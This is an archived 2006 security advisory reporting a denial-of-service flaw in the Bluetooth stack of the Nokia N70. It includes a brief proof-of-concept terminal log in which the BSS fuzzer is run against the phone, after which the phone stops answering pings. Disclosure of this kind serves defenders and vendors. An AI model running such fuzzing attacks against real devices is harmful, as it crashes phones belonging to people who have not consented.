[Software affected] Bluetooth Stack on Nokia cell phones [Version] Nokia N70 and maybe other models [Impact] Denial of Service on Bluetooth Stack (maybe more) - Message "System Error" - Phone DoS (shutdown) [Credits] Pierre Betouin - pierre.betouin@private - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher - Linux) BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml [Vendor] notified now [Original advisory] http://www.secuobs.com/news/10022006-nokia_n70.shtml#english http://www.secuobs.com/news/10022006-nokia_n70.shtml#french [Proof of Concept] # l2ping -c 3 00:15:A0:XX:XX:XX Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ... 0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms 0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms 0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms 3 sent, 3 received, 0% loss # ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX (... snip ...) # l2ping -c 1 00:15:A0:XX:XX:XX Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ... no response from 00:80:37:ZZ:ZZ:ZZ id 0 1 sent, 0 received, 100% loss
This archive was generated by hypermail 2.1.3 : Fri Feb 10 2006 - 16:49:29 PST